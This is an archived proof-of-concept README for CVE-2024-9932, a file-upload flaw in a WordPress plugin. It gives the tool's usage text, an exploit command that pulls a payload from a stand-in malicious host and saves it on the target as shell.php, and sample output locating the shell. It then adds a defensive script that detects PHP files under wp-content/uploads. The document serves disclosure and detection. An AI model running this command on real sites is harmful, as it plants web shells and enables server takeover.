Introduction
# CVE-2024-9932-POC
## Description
The Wux Blog Editor WordPress plugin is vulnerable to arbitrary file upload due to insufficient file type validation in the wuxbt_insertImageNew function. Versions up to and including 3.0.0 are affected. The flaw allows unauthenticated attackers to upload arbitrary files to the server, which can lead to remote code execution (RCE).
## Vulnerability Details
The vulnerability stems from improper file type validation in the wuxbt_insertImageNew function, which lets attackers upload malicious files to the server without authentication.

Attack scenario:
1. The attacker identifies a website running the vulnerable plugin.
2. The attacker exploits the file upload functionality to upload a malicious PHP shell.
3. The attacker executes commands on the compromised server.
## Usage
```
usage: CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL, --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php
```
## Exploit command
```
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
```
## Results
Successful upload example:
1. File found:
```
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
```
2. Execution result: navigate to the file's URL to execute the payload.
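As an added, defender-side example (not code from the PoC repository), the following Python script flags the outcome shown in the results above: PHP files requested from, or present under, `wp-content/uploads`, a directory that should never contain executable PHP. The log lines and the files it scans are constructed samples; the `wp-content/uploads/YYYY/MM` layout follows the example output above.

```python
"""Flag PHP files under wp-content/uploads, both in access logs and on disk."""
import re
import tempfile
from pathlib import Path

# Request field of a combined-format access log line: "METHOD /path HTTP/x.y"
_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# PHP-like extensions, also when buried in a double extension such as "x.php.jpg"
_PHP_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)(?:\.|$|\?)", re.I)
_PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.I)

# Constructed sample log lines; only the first and third should be reported.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2025:10:01:02 +0000] "GET /wordpress/wp-content/uploads/2025/01/shell.php HTTP/1.1" 200 512',
    '10.0.0.6 - - [12/Jan/2025:10:01:03 +0000] "GET /wordpress/wp-content/uploads/2025/01/photo.jpg HTTP/1.1" 200 9000',
    '10.0.0.5 - - [12/Jan/2025:10:01:04 +0000] "GET /wordpress/wp-content/uploads/2025/01/x.php.jpg HTTP/1.1" 200 120',
    '10.0.0.7 - - [12/Jan/2025:10:01:05 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 3000',
]


def suspicious_log_requests(lines) -> list[str]:
    """Return request paths that fetch a PHP-like file from the uploads tree."""
    paths = [m.group("path") for m in map(_REQ.search, lines) if m]
    return [p for p in paths if "/wp-content/uploads/" in p and _PHP_EXT.search(p)]


def php_files_in_uploads(uploads_dir: str) -> list[str]:
    """Walk an uploads tree; report files with a PHP extension or a PHP open tag in the first 4 KiB."""
    findings = []
    for path in Path(uploads_dir).rglob("*"):
        if path.is_file() and (_PHP_EXT.search(path.name) or _PHP_TAG.search(path.read_bytes()[:4096])):
            findings.append(path.relative_to(uploads_dir).as_posix())
    return sorted(findings)


def demo() -> dict:
    """Build a constructed uploads tree in a temp dir, scan it and SAMPLE_LOG, return both findings."""
    with tempfile.TemporaryDirectory() as tmp:
        month = Path(tmp, "2025", "01")
        month.mkdir(parents=True)
        (month / "shell.php").write_bytes(b"<?php echo 'constructed'; ?>")    # flagged by name and content
        (month / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed JPEG")  # benign
        (month / "x.php.jpg").write_bytes(b"GIF89a")                            # double extension, by name
        (month / "notes.txt").write_bytes(b"<?= 'tag inside a .txt' ?>")        # flagged by content
        files = php_files_in_uploads(tmp)
    return {"log": suspicious_log_requests(SAMPLE_LOG), "files": files}


if __name__ == "__main__":
    print(demo())
```

Point `php_files_in_uploads` at a real `wp-content/uploads` directory and feed `suspicious_log_requests` the web server's access log to run the same checks in production.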
## Disclaimer
This tool is for educational purposes only. Unauthorized use of this script on systems without permission is illegal.
File snapshot
[4.0K] /data/pocs/ef38f52d2cf94e8baad793befffe73dfe3159b07
├── [5.4K] CVE-2024-9932.py
└── [1.7K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.